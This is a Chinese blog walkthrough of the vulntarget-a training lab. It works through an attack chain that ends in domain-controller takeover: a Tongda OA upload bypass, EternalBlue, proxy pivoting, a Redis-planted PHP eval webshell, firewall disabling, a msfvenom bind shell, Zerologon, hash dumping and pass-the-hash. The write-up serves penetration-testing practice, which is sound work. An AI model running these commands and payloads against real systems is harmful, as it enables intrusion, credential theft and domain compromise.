[vulntarget靶场] vulntarget-a

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量330 收藏
点赞数
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132948400
版权

靶场地址:https://github.com/crow821/vulntarget

拓扑结构

在这里插入图片描述

信息收集

主机发现

netdiscover -r 192.168.127.0/24 -i eth0

在这里插入图片描述

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130

在这里插入图片描述

访问目标80,发现为通达oa

在这里插入图片描述

WIN7漏洞利用

通达oa后台getshell

默认账号admin,空密码登录后台

在这里插入图片描述

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

在这里插入图片描述

点击系统管理 -> 附件管理 -> 添加存储目录

在这里插入图片描述

点击组织 -> 系统管理员 -> 上传附件

在这里插入图片描述

上传txt后缀文件,根据windows系统自动去掉.的特性,利用burp抓包修改文件后缀为.php.

在这里插入图片描述

文件上传到:http://192.168.127.130/im/2309/528190762.a.php,利用哥斯拉连接

在这里插入图片描述

在这里插入图片描述

CVE-2017-0144(永恒之蓝)

除了80端口的通达oa,目标还开放了445端口

msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run

在这里插入图片描述

内网渗透

查看win7网卡信息,发现存在另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

利用msf的post/windows/gather/arp_scanner模块收集内网存活主机

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

在这里插入图片描述

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run

在这里插入图片描述

修改/etc/proxychains4.conf

在这里插入图片描述

利用proxychains4对内网10.0.20.99主机进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

在这里插入图片描述

在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/

在这里插入图片描述

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

在这里插入图片描述

proxychains4代理,利用哥斯拉连接

proxychains4 java -jar godzilla.jar

在这里插入图片描述

在这里插入图片描述

关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off		#关闭防火墙

在这里插入图片描述

#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

在这里插入图片描述

利用哥斯拉上传

在这里插入图片描述

执行

.\shell.exe

在这里插入图片描述

msf上线

exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run

在这里插入图片描述

win2016上发现另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

发现win2016加入域,域名:vulntarget.com

在这里插入图片描述

查看域内主机

net group "Domain Computers" /domain

在这里插入图片描述

查看域控

net group "Domain Controllers" /domain

在这里插入图片描述

域控ip:10.0.10.110

ping -n 1 WIN2019

在这里插入图片描述

CVE-2020-1472上线域控

打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

在这里插入图片描述

wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

连接3389

proxychains4 remmina

在这里插入图片描述

切换动态分辨率

在这里插入图片描述

在这里插入图片描述

恢复域控密码

保存注册表

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

下载.save文件到本地解密

lget sam.save
lget security.save
lget system.save

在这里插入图片描述

解密

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

还原密码

proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0

在这里插入图片描述

再次尝试dump域控hash,发现失败,证明已经还原

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 5903
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Vulntarget-a 打靶练习
weixin_44770698的博客
05-02 686
vulntarget-a
vulntarget-a靶场
shajianlong666的博客
06-29 193
vulntarget-a
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 4818
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
内网渗透vulntarget-a 多层域控靶场
weixin_68408599的博客
12-22 1743
网络拓扑图如下这里我们本次渗透测试,外网Win7IP地址为192.168.127.91靶机信息:靶机用户名密码Windows 7win7adminAdmin@123Admin#123Admin@666靶机下载地址:https://github.com/crow821/vulntarget这个靶场是我第一个搭建在本地上的靶场,虽然中路有很多挫折,比如在前期配置外网网卡时候,发现DHCP一直分配不上ip地址,一直是168.254.X.X,好在后面及时发现问题,发现网卡设置错了。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6384
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
本地靶场搭建--常见靶场环境集锦
04-28
靶场集锦包含如下 DVWA、 pikachu、 sqli-labs~old、 sqli-labs-master、 upload-labs、 xsslabs、 XSS测试平台
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2193
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 8736
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
qq_51577576的博客
03-06 2460
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
自主搭建的三层网络域渗透靶场打靶记录
Innocence_0的博客
08-01 665
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 536
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
网络安全(补充)
m0_62207482的博客
06-11 721
上下文因素主要有事务、设备和网络模式。例如一些网站的访问根据地址位置信息来判断来访者的身份,以确认是否授权访问 Kerberos系统涉及四个基本实体:1Kerberos客户机(用户用来访问服务器设备)、2AS(认证服务器,识别用户身份并提供TGS会话密钥)、3(TGS票据发放服务器、未申请服务的用户授予票据)、4(应用服务器,为用户提供服务的设备或系统) 一般来说,PKI涉及多个实体之间的协商和操作,主要实体包括CA、RA、终端实体、客户端、目录服务器 身份认证网关产品的技术特点是利用数字证书、根据同
国内外网络安全现状分析
waitaikong_的博客
06-10 510
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值